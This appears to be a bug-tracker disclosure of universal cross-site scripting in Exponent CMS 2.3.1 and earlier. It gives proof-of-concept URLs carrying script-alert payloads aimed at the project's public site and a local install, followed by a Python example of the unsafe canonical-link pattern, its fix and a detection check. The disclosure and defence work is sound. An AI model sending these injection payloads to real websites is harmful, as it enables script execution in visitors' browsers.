#1230 open
Mayuresh Dani

Universal cross-site scripting in Exponent CMS 2.3.1 and prior

Reported by Mayuresh Dani | November 4th, 2014 @ 02:56 PM | in User issues

Hi,

We found a universal cross-site scripting vulnerability while testing Exponent CMS versions prior to 2.3.1. It can be verified by visiting -
http://www.exponentcms.org/news/show/title/time-for-a-heavy-harvest...

http://www.exponentcms.org/news/show/title/%22%3E%3Cscript%3Ealert%...

http://www.exponentcms.org/news/%22%3E%3Cscript%3Ealert%287%29%3C/s...

Seems like Exponent CMS builds the canonical path field from an unsanitized URL, which can be used to execute arbitrary scripts.

Also, another cross-site scripting vulnerability exists in version 2.3.1, for example -
http://localhost/exponent/index.php?int=&src=%22/%3E%3CSCRIPT%3...

Thanks,
Mayuresh Dani (mdani@qualys.com)
Narendra Shinde (nshinde@qualys.com)
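The root cause named in the report is the canonical-URL field being built from the unsanitized request path and written straight into an HTML attribute. The following Python snippet is an added illustration of that bug class and its fix; it is not Exponent CMS code (Exponent is PHP) and does not reproduce its internals. It assumes the CMS receives the already-decoded path (so `%22` has become `"` by the time the canonical link is built) and uses a constructed placeholder origin. The unsafe builder shows why a quote in the path breaks out of the attribute; the hardened builder percent-encodes the path and HTML-escapes the attribute value, and a small log/WAF-style check flags decoded paths that carry attribute-breakout characters.

```python
import html
from urllib.parse import quote

# Constructed placeholder origin; the real site origin would be configured by the CMS.
SITE_ORIGIN = "https://example.invalid"

# Characters that can terminate an HTML attribute or open a tag once a path
# has been URL-decoded. Used only for detection/alerting on request logs.
BREAKOUT_CHARS = frozenset('"\'<>')


def canonical_link_unsafe(decoded_path: str) -> str:
    """Vulnerable pattern: the decoded request path is interpolated into the
    href attribute with no encoding, so a quote in the path closes the
    attribute and anything after it is parsed as markup."""
    return f'<link rel="canonical" href="{SITE_ORIGIN}{decoded_path}">'


def canonical_link_safe(decoded_path: str) -> str:
    """Hardened pattern: keep only the path component, re-apply percent
    encoding so the value is a well-formed URL, then HTML-escape the result
    before placing it in a double-quoted attribute."""
    path = decoded_path.split("?", 1)[0].split("#", 1)[0]  # canonical URLs carry no query/fragment
    if not path.startswith("/"):
        path = "/" + path
    # quote() encodes everything except unreserved characters and '/'; letters and
    # digits are always left alone, so a normal slug comes back unchanged.
    encoded_path = quote(path, safe="/-._~")
    attr_value = html.escape(SITE_ORIGIN + encoded_path, quote=True)
    return f'<link rel="canonical" href="{attr_value}">'


def path_has_breakout_chars(decoded_path: str) -> bool:
    """Detection helper: True when a decoded request path contains characters
    that have no place in a content slug but do end an attribute or open a tag.
    Suitable for flagging lines in access logs or for a WAF rule."""
    return any(ch in BREAKOUT_CHARS for ch in decoded_path)


def is_single_link_tag(fragment: str) -> bool:
    """Sanity check on rendered output: a canonical link must be exactly one
    tag. More than one '<' means the path injected additional markup."""
    return fragment.count("<") == 1 and fragment.count(">") == 1


if __name__ == "__main__":
    benign = "/news/show/title/time-for-a-heavy-harvest"
    hostile = '/news/show/title/"><script>alert(7)</script>'  # payload from the report, decoded
    for p in (benign, hostile):
        print("flagged:", path_has_breakout_chars(p))
        print("unsafe :", canonical_link_unsafe(p))
        print("safe   :", canonical_link_safe(p))
```

The two builders produce identical output for an ordinary slug, which is the point: encoding on output costs nothing for legitimate URLs and only changes behaviour when the path carries markup. The detection helper is deliberately coarse; it is meant to surface anomalies in request logs, not to replace output encoding.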

Bug Tracker for Exponent CMS